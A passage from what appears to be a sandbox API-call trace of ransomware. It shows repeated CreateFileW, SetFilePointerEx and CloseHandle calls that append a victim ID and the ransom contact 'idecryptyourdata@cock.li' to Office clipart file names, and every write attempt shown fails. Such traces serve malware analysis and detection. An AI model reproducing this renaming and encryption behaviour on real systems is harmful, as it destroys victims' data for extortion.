dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.205] CloseHandle (hObject=0x42c) returned 1 [0172.211] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.211] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03513_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03513_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.211] CloseHandle (hObject=0x42c) returned 1 [0172.213] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.213] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03668_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03668_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.213] CloseHandle (hObject=0x42c) returned 1 [0172.214] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.214] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03731_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.215] CloseHandle (hObject=0x42c) returned 1 [0172.215] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.216] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03795_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.216] CloseHandle (hObject=0x42c) returned 1 [0172.217] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.217] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe04050_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.217] CloseHandle (hObject=0x42c) returned 1 [0172.218] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.218] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0172.218] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05665_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0172.338] CloseHandle (hObject=0x42c) returned 1 [0173.156] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.156] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.156] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH01046J.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph01046j.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.156] CloseHandle (hObject=0x42c) returned 1 [0173.163] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.163] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.163] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02749U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02749u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.163] CloseHandle (hObject=0x438) returned 1 [0173.164] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.164] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.164] CloseHandle (hObject=0x438) returned 1 [0173.165] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.165] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02750U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02750u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.165] CloseHandle (hObject=0x438) returned 1 [0173.166] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.166] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.166] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752G.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752g.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.167] CloseHandle (hObject=0x438) returned 1 [0173.167] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.168] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.168] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02752U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02752u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.168] CloseHandle (hObject=0x438) returned 1 [0173.543] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.543] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH02753U.BMP.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph02753u.bmp.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.544] CloseHandle (hObject=0x438) returned 1 [0173.545] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.545] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.545] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03425I.JPG.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03425i.jpg.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.545] CloseHandle (hObject=0x438) returned 1 [0173.546] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.546] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.547] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRT.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrt.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.547] CloseHandle (hObject=0x438) returned 1 [0173.548] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.548] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.548] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PRRTINST.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\prrtinst.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.548] CloseHandle (hObject=0x438) returned 1 [0173.549] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.549] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.549] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSRETRO.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\psretro.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.550] CloseHandle (hObject=0x438) returned 1 [0173.555] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.555] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.555] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETLG.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketlg.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.556] CloseHandle (hObject=0x438) returned 1 [0173.557] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.557] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.557] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSSKETSM.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pssketsm.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.557] CloseHandle (hObject=0x438) returned 1 [0173.559] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.559] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.559] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PSWAVY.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pswavy.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.559] CloseHandle (hObject=0x438) returned 1 [0173.560] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.560] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.560] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RE00006_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\re00006_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.561] CloseHandle (hObject=0x438) returned 1 [0173.562] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.562] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\RECYCLE.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\recycle.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.562] CloseHandle (hObject=0x438) returned 1 [0173.563] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.564] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.564] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00256_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00256_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.564] CloseHandle (hObject=0x438) returned 1 [0173.565] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.565] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.566] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00260_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00260_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.566] CloseHandle (hObject=0x438) returned 1 [0173.567] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.567] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00268_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00268_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.567] CloseHandle (hObject=0x438) returned 1 [0173.568] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.569] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.569] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00286_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00286_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.569] CloseHandle (hObject=0x438) returned 1 [0173.570] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.570] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.570] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00298_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00298_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.571] CloseHandle (hObject=0x438) returned 1 [0173.572] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.572] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00308_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00308_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.573] CloseHandle (hObject=0x438) returned 1 [0173.575] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.575] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.575] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00345_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00345_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.576] CloseHandle (hObject=0x438) returned 1 [0173.577] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.577] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.577] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00452_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00452_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.577] CloseHandle (hObject=0x438) returned 1 [0173.579] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.579] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL00712_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl00712_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0173.579] CloseHandle (hObject=0x438) returned 1 [0173.580] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.580] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec0 | out: lpNewFilePointer=0x0) returned 1 [0173.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\SL01040_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\sl01040_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 